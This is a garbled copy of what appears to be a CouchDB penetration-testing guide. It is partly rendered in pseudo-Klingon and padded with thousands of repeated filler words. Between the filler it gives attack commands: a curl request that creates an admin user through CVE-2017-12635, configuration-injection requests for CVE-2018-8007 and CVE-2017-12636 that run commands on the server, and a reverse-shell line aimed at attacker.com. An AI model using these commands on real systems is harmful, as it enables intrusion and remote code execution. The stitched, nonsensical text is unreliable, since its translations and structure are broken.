vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlh
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
CouchDB Privilege Escalation CVE-2017-12635
Qapla'! Erlang je JavaScript JSON parsers vItlhutlh admin user jImej credentials hacktricks:hacktricks request vItlhutlh:
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"
More information about this vuln here.
CouchDB RCE
Erlang Cookie Security Overview
Example from here.
In the CouchDB documentation, specifically in the section concerning cluster set-up (link), the use of ports by CouchDB in a cluster mode is discussed. It's mentioned that, as in standalone mode, port 5984 is used. Additionally, port 5986 is for node-local APIs, and importantly, Erlang requires TCP port 4369 for the Erlang Port Mapper Daemon (EPMD), facilitating node communication within an Erlang cluster. This setup forms a network where each node is interlinked with every other node.
A crucial security advisory is highlighted regarding port 4369. If this port is made accessible over the Internet or any untrusted network, the system's security heavily relies on a unique identifier known as the "cookie." This cookie acts as a safeguard. For instance, in a given process list, the cookie named "monster" might be observed, indicating its operational role in the system's security framework.
www-data@canape:/$ ps aux | grep couchdb
root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb
root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb
homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b
Exploiting CVE-2018-8007 through Modification of local.ini
Example from here.
A recently disclosed vulnerability, CVE-2018-8007, affecting Apache CouchDB was explored, revealing that exploitation requires write permissions to the local.ini file. Although not directly applicable to the initial target system due to security restrictions, modifications were made to grant write access to the local.ini file for exploration purposes. Detailed steps and code examples are provided below, demonstrating the process.
First, the environment is prepared by ensuring the local.ini file is writable, verified by listing the permissions:
ls -l /etc/couchdb/local.ini
If the file is not writable, the permissions can be changed using the following command:
chmod +w /etc/couchdb/local.ini
Once the file is writable, the next step is to modify the local.ini file to enable the vulnerable feature. This can be done by adding the following line to the file:
[couchdb]
os_process_timeout=20000
After making the necessary changes, save the file and restart the CouchDB service for the modifications to take effect.
root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini
-rw-rw-rw- 1 homer homer 4841 Sep 14 17:39 local.ini
-r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk
-r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args
To exploit the vulnerability, a curl command is executed, targeting the cors/origins configuration in local.ini. This injects a new origin along with additional commands under the [os_daemons] section, aiming to execute arbitrary code:
curl -X PUT http://localhost:5984/_config/cors/origins -d '"http://attacker.com"'
curl -X PUT http://localhost:5984/_config/cors/origins -d '"http://attacker.com", "bash -i >& /dev/tcp/attacker.com/1234 0>&1"'
www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf"
Subsequent verification shows the injected configuration in local.ini, contrasting it with a backup to highlight the changes:
Klingon Translation:
Subsequent verification shows the injected configuration in local.ini, contrasting it with a backup to highlight the changes:
root@canape:/home/homer/etc# diff local.ini local.ini.bk
119,124d118
< [cors]
< origins = 0xdf
< [os_daemons]
< test_daemon = /usr/bin/touch /tmp/0xdf
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
QawHaq CouchDB pentesting
**QawHaq CouchDB
root@canape:/home/homer/bin# ps aux | grep couch
DaH jImej CouchDB process qar'a' 'ej Hoch 'e' vItlhutlh. HochDI' vItlhutlh, 'ej injected command vItlhutlh, vaj vItlhutlh vItlhutlh file vItlhutlh:
root@canape:/home/homer/etc# kill 711
root@canape:/home/homer/etc# ls /tmp/0xdf
/tmp/0xdf
Exploring CVE-2017-12636 with Write Permissions on local.ini
Example from here.
A vulnerability known as CVE-2017-12636 was explored, which enables code execution via the CouchDB process, although specific configurations may prevent its exploitation. Despite numerous Proof of Concept (POC) references available online, adjustments are necessary to exploit the vulnerability on CouchDB version 2, differing from the commonly targeted version 1.x. The initial steps involve verifying the CouchDB version and confirming the absence of the expected query servers path:
CVE-2017-12636 jatlh CouchDB Daq yIqej
Daq vaj vItlhutlhlaHbe'chugh, CouchDB process Daq code execution jatlh, 'ach vItlhutlhlaHbe'chugh configurations prevent exploitation. Proof of Concept (POC) references online vItlhutlhlaHbe'chugh, CouchDB version 2 vItlhutlhlaHbe'chugh vulnerability exploit vItlhutlhlaHbe'chugh adjustments vItlhutlhlaH. CouchDB version 1.x vItlhutlhlaHbe'chugh commonly targeted vItlhutlhlaHbe'chugh. CouchDB version vItlhutlhlaHbe'chugh verify 'ej expected query servers path vItlhutlhlaHbe'chugh confirm involve initial steps:
curl http://localhost:5984
curl http://0xdf:df@localhost:5984/_config/query_servers/
To accommodate CouchDB version 2.0, a new path is utilized:
/v2/_all_dbs
This path allows you to retrieve a list of all databases in the CouchDB instance.
curl 'http://0xdf:df@localhost:5984/_membership'
curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers
Attempts to add and invoke a new query server were met with permission-related errors, as indicated by the following output:
Qapla'! QaStaHvIS 'ej QaStaHvIS query server vItlhutlhlaHbe'lu'chugh, 'ej vItlhutlhlaHbe'lu'chugh permission-related errors, 'ach vItlhutlhlaHbe'lu'chugh output:
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
Translation:
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
